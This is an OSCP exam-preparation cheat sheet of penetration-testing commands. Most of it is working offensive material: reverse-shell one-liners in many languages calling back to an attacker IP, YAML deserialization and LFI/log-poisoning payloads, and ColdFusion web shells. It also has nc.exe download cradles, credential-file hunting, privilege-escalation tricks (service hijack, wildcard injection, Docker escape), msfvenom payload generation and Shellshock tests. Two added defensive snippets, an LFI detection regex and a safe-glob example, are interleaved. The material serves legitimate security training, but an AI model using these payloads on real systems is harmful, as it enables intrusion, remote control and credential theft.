Collection of commands, tips and tricks and references I found useful during preparation for OSCP exam.
nmap -sn 10.11.1.0/24
nbtscan -r 10.11.1.0/24
dnsrecon -r 10.11.1.0/24 -n <DNS IP>
nmap -sV -sT -p- <target IP>
xprobe2 <target IP>
nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 target
nmap -p139,445 <target IP> --script smb-vuln*
enum4linux -a <target IP>
enum4linux -a -u <user> -p <passwd> <targetIP>
gobuster -u http://<target IP> -w /usr/share/dirb/wordlists/big.txt
nikto -host http://<target IP>
- Unsafe YAML parsing may allow arbitrary Python objects to be created and, as a result, remote code execution:
!!python/object/apply:os.system ["bash -i >& /dev/tcp/yourIP/4444 0>&1"]
- Check for LFI
Add /etc/passwd%00 to any GET/POST argument. On Windows try C:\Windows\System32\drivers\etc\hosts%00 or C:\autoexec.bat%00.
A quick win could also be any of these files: c:\sysprep.inf, c:\sysprep\sysprep.xml or c:\unattend.xml, as they can contain local admin credentials. On Linux it's worth checking /proc/self/environ to see whether any credentials are passed to the running process via environment variables.
- Fetching .php files via LFI
/index.php?somevar=php://filter/read=convert.base64-encode/resource=<file path>%00
This returns the base64-encoded PHP source. Good for fishing up config.php or similar.
- Abusing /proc/self/environ LFI to gain a reverse shell
In some situations it's possible to abuse /proc/self/environ to execute a command. For example:
index.php?somevar=/proc/self/environ&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Apache access.log + LFI = PHP injection
If the Apache logs can be read via LFI, it may be possible to inject PHP code into them and then include the log file via the LFI. With netcat send a request like this:
GET /<?php system($_GET["cmd"]);?>
- auth.log + LFI
ssh '<?php system($_GET["cmd"]);?>'@targetIP
and then LFI /var/log/auth.log
- /var/mail + LFI
mail -s '<?php system($_GET["cmd"]);?>' someuser@targetIP < /dev/null
- PHP expect:// wrapper
index.php?somevar=expect://ls
- PHP php://input wrapper
curl -X POST "targetIP/index.php?somevar=php://input" --data '<?php system("curl -o cmd.php yourIP/cmd.txt");?>'
Then access targetIP/cmd.php
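As an added defensive example (not part of the original cheat sheet): a small POSIX shell function that flags, in an Apache access log, the LFI and log-poisoning request patterns covered in this section (traversal, null bytes, php:// and expect:// wrappers, /proc/self/environ, PHP tags in the request line or User-Agent). The log lines are constructed samples; the addresses and paths are made up.

```shell
#!/bin/sh
# Added example: flag LFI / log-poisoning attempts in an Apache combined-format log.
# The sample log written below is constructed for this demo.

write_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "curl/7.68.0"
10.0.0.9 - - [12/Mar/2024:10:01:11 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=config.php HTTP/1.1" 200 2210 "-" "curl/7.68.0"
10.0.0.9 - - [12/Mar/2024:10:01:15 +0000] "GET /<?php echo 'poisoned'; ?> HTTP/1.1" 404 209 "-" "curl/7.68.0"
10.0.0.9 - - [12/Mar/2024:10:01:20 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 77 "-" "<?php echo 'ua'; ?>"
10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /images/logo.png HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
EOF
}

# Case-insensitive ERE covering the techniques in this section: directory traversal
# (plain and URL-encoded), null-byte truncation, PHP stream wrappers, /proc/self/environ
# and PHP open tags anywhere in the line (request path or User-Agent).
LFI_PATTERN='\.\./|%2e%2e%2f|%00|php://(filter|input)|expect://|/proc/self/environ|<\?php'

# Print the matching lines, prefixed with their line number for triage.
flag_lfi_requests() {
    grep -n -E -i "$LFI_PATTERN" "$1"
}

# Number of flagged lines (0 when the log is clean).
count_lfi_requests() {
    flag_lfi_requests "$1" | wc -l | tr -d ' '
}

# Distinct client IPs behind the flagged requests, one per line.
lfi_sources() {
    flag_lfi_requests "$1" | sed 's/^[0-9]*://' | cut -d' ' -f1 | sort -u
}
```

Run `flag_lfi_requests /var/log/apache2/access.log` on a real log to get a first triage list; tune LFI_PATTERN to the application's own legitimate URLs to keep false positives down.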
- Is it Enterprise or Community?
Check how it handles .jsp files: curl targetIP/blah/blah.jsp. If 404, it's Enterprise; if 500, Community.
- Which version?
/CFIDE/adminapi/base.cfc?wsdl has a useful comment indicating the exact version.
- LFI in admin login locale
/CFIDE/administrator/enter.cfm?locale=../../../../ColdFusion9\lib\password.properties
This may need the full path, which can be obtained with the help of /CFIDE/componentutils/cfexplorer.cfc
- Local upload and execution
Once access to the admin panel is gained it's possible to use the task scheduler to download a file and a system probe to execute it.
Debugging & Logging -> Scheduled Tasks -> url=, Publish - save output to file (some writable path). Then manually execute this task, which will download and save our file.
To execute it create a probe: Debugging & Logging -> System Probes -> URL=, Probe fail - fail if probe does not contain "blahblah", Execute program. Then run the probe manually.
- Files worth grabbing
- CF7 \lib\neo-query.xml
- CF8 \lib\neo-datasource.xml
- CF9 \lib\neo-datasource.xml
- Simple remote CFM shell
<html>
<body>
<cfexecute name="#URL.runme#" arguments="#URL.args#" timeout="20">
</cfexecute>
</body>
</html>
- Simple remote shell using Java (if CFEXECUTE is disabled)
<cfset runtime = createObject("java", "java.lang.System")>
<cfset props = runtime.getProperties()>
<cfdump var="#props#">
<cfset env = runtime.getenv()>
<cfdump var="#env#">
- Generic dirbusting
gobuster -u targetIP -w /usr/share/dirb/wordlists/big.txt
- Fuzz some CGI
gobuster -u targetIP -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s 200
- Bash
bash -i >& /dev/tcp/yourIP/4444 0>&1
- Perl (Linux)
perl -e 'use Socket;$i="yourIP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- Perl (Windows)
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"yourIP:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
- Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yourIP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- PHP
php -r '$sock=fsockopen("yourIP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
- Ruby
ruby -rsocket -e'f=TCPSocket.open("yourIP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
- Java (Linux)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/yourIP/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
- Groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());
so.flush();po.flush();
Thread.sleep(50);
try {p.exitValue();
break;
}catch (Exception e){}};
p.destroy();
s.close();
- xterm
xterm -display yourIP:1
And on your side authorize the connection with xhost +targetIp
and catch it with Xnest :1
- socat
Listener (your side):
socat file:`tty`,raw,echo=0 tcp-listen:4444
target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:yourIP:4444
- Python (Linux)
python -c 'import pty; pty.spawn("/bin/bash")'
Then Ctrl-Z back to the local shell and run stty raw -echo, return to the remote shell with fg, and set the terminal with export TERM=xterm.
- Python (Windows)
c:\python26\python.exe -c 'import pty; pty.spawn("c:\\windows\\system32\\cmd.exe")'
- Expect
sh.exp:
#!/usr/bin/expect
spawn sh
interact
- Script
script /dev/null
- Get version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- Get users
net users
- Get user info
net user <username>
- Check local connections and listening ports (compare with the nmap scan to see if there are any hidden ports)
netstat -ano
- Firewall status
netsh firewall show state
netsh firewall show config
- Scheduled tasks
List: schtasks /query /fo LIST /v
Create: schtasks /Create /TN mytask /SC MINUTE /MO 1 /TR "mycommands"
Run: schtasks /Run /TN mytask
Delete: schtasks /Delete /TN mytask
- Running tasks
List: tasklist /SVC
Kill by image name: taskkill /IM <exe name> /F
Kill by PID: taskkill /PID <pid> /F
- Services
List: net start
Long name to key name: sc getkeyname "long name"
Details: sc qc <key name>
Config: sc config <key name>
- Low hanging fruit to grab
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
- Are installers running elevated?
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
- Find interesting files
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
- Find interesting registry entries
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
- Permissions
Check details on a service: accesschk.exe /accepteula -ucqv <service name>
Find modifiable services: accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *
Folder permissions: accesschk.exe -dqv <path>
cacls <path>
icacls <path\file>
- Quick win on WinXP SP0/1
sc config upnphost binpath= "C:\nc.exe -nv yourIP 4444 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
net stop upnphost
net start upnphost
- Quick wins
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\ORL\WinVNC3\Password"
- Download file with VBS
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://yourIp/nc.exe", False
xHttp.Send
with bStrm
    .type = 1 ' binary
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\nc.exe", 2 ' overwrite
end with
- Download with PowerShell 3+
powershell -NoLogo -Command "Invoke-WebRequest -Uri 'https://yourIP/nc.exe' -OutFile 'c:\Users\Public\Downloads\nc.exe'"
- Download with PowerShell 2
powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('https://yourIP/nc.exe', 'c:\Users\Public\Download\nc.exe')"
- Download with Python
c:\Python26\python.exe -c "import urllib; a=open('nc.exe', 'wb'); a.write(urllib.urlopen('http://yourIP/nc.exe').read()); a.flush();a.close()"
- Windows-specific LPE vulns
- https://www.exploit-db.com/exploits/11199/
- https://www.exploit-db.com/exploits/18176/
- https://www.exploit-db.com/exploits/15609/
- https://www.securityfocus.com/bid/42269/exploit
- https://www.securityfocus.com/bid/46136/exploit
- Basic enumeration
System info
uname -a
Arch
uname -m
Kernel
cat /proc/version
Distro
cat /etc/*-release
or: cat /etc/issue
Filesystem
df -a
Users
cat /etc/passwd
Groups
cat /etc/group
Super accounts
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
Currently logged in
finger, w, who -a, pinky, users
Last logged users
last, lastlog
Cheeky test
sudo -l
Anything interesting we can run as sudo?
sudo -l 2>/dev/null | grep -w -E 'nmap|perl|awk|find|bash|sh|man|more|less|vi|vim|nc|netcat|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null
History
history
Env vars
env
Available shells
cat /etc/shells
SUID files
find / -perm -4000 -type f 2>/dev/null
SUID owned by root
find / -uid 0 -perm -4000 -type f 2>/dev/null
SGID files
find / -perm -2000 -type f 2>/dev/null
World writable
find / -perm -2 -type f 2>/dev/null
World writable executed
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
World writable dirs
find / -perm -2 -type d 2>/dev/null
rhosts files
find /home -name '*.rhosts' -print 2>/dev/null
Plan files
find /home -iname '*.plan' -exec ls -la {} \; -exec cat {} \; 2>/dev/null
hosts.equiv
find /etc -iname hosts.equiv -exec ls -la {} \; -exec cat {} \; 2>/dev/null
Can we peek at /root?
ls -ahlR /root/
Find ssh files
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la
Inetd
ls -la /usr/sbin/in.*
Grep logs for loot
grep -l -i pass /var/log/*.log 2>/dev/null
What do we have in logs
find /var/log -type f -exec ls -la {} \; 2>/dev/null
Find conf files in /etc
find /etc/ -maxdepth 1 -name '*.conf' -type f -exec ls -la {} \; 2>/dev/null
As above:
ls -la /etc/*.conf
List open files
lsof -i -n
Can we read root mail?
head /var/mail/root
What is running as root?
ps aux | grep root
Lookup paths to running files
ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'
Exports and permissions of NFS
ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
List sched jobs
ls -la /etc/cron*
List open connections (run with sudo/as root for more results)
lsof -i
Installed pkgs:
dpkg -l (Debian), rpm -qa (RH)
sudo version?
sudo -V
Available compilers
dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null
If you find a privileged bash script which uses a wildcard when iterating over files in a folder you can write to, note that you can create files whose names will be parsed as arguments to the command used on those files. This opens up an interesting attack vector, e.g. when there's a for loop which runs cp on each file. If you create a file with touch -- '--someargument', it will be passed to the command as --someargument.
A good example is a script that copies files somewhere. Adding a file named --preserve=mode, copying /bin/bash into the same folder and changing its mode to 4755 will result in the script copying bash as root with the SUID bit set. Executing that copy with bash -p gives a bash running as root.
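The wildcard-argument problem described above, reduced to a harmless demonstration as an added example (not from the original cheat sheet): a file called --help stands in for --preserve=mode, and the hardened loop beside the vulnerable one shows the fix a script author should apply. Everything happens under mktemp directories.

```shell
#!/bin/sh
# Added example: bare-glob argument injection and its mitigation. The file names here
# are constructed for the demo; "--help" is used because it is harmless.

# Build a source directory with one normal file and one whose name starts with "--".
setup_demo_dir() {
    d=$(mktemp -d)
    echo data > "$d/normal.txt"
    echo data > "$d/--help"   # stands in for --preserve=mode in the text above
    echo "$d"
}

# Vulnerable pattern: cd into the folder and expand a bare glob, so "--help" reaches
# cp as an option. GNU cp prints its usage and copies nothing; BSD cp errors out.
unsafe_copy() {
    ( cd "$1" && cp * "$2"/ ) >/dev/null 2>&1
}

# Hardened pattern: prefix every match with ./ and end option parsing with --, so no
# expansion result can ever start with "-". Both files are copied as plain files.
safe_copy() {
    ( cd "$1" && cp -- ./* "$2"/ ) >/dev/null 2>&1
}

# Number of regular files that actually arrived in the destination directory.
count_copied() {
    find "$1" -type f | wc -l | tr -d ' '
}
```

The same ./ prefix (or a -- separator) neutralises the tar --checkpoint-action and rsync -e variants of this bug as well; auditing cron and sudo scripts for bare `*` after a `cd` is a quick way to find them.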
Since Docker most likely runs as root, if you can execute docker commands as an unprivileged user you can very likely use Docker's privileges instead.
docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
Note that the root folder of the host is mounted as /host. You'll also see all processes running on the host and be connected to the same NICs.
You may want to look into escaping UTS and IPC namespacing with --uts=host --ipc=host
curl -T nc.exe http://targetIP/nc.txt
curl -X MOVE -v -H "Destination:http://targetIP/nc.exe" http://targetIP/nc.txt
msfvenom -l
- Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
- Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
- Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
- PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
- ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
- JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
- WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
- Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
- Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
- Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
For all shellcode formats see msfvenom --help-formats for the valid parameters. msfvenom will output code that can be cut and pasted into the chosen language for your exploits.
- Linux-based shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
- Windows-based shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
- Mac-based shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
- CVE-2014-6271
env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id
- CVE-2014-7169
env X='() { (a)=>\' bash -c "echo date"; cat echo
- CVE-2014-7186
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
- CVE-2014-7187
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
- CVE-2014-6278
env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
- OSCP Exam Guide - MUST read!
- The Magic of Learning - a real treasure trove!
- FuzzySecurity - this is something you must bookmark... period. I found the Windows Privilege Escalation Fundamentals especially useful.
- WMIC reference/guide
- SysInternals - this is a must have for working on Windows boxes.
- PowerSploit
- Elevating privileges by exploiting weak folder permissions
- ColdFusion for PenTesters
- ColdFusion Path Traversal
- Penetration Testing Tools Cheat Sheet - Good read. Check out other cheat sheets on this page too!
- fimap - LFI/RFI scanner
- Changeme - default password scanner
- CIRT Default Passwords DB
- From LFI to Shell
- Useful Linux commands
- Local Linux Enumeration
- Creating Metasploit Payloads
- Shellshock PoCs
- GTFOBins
- BustaKube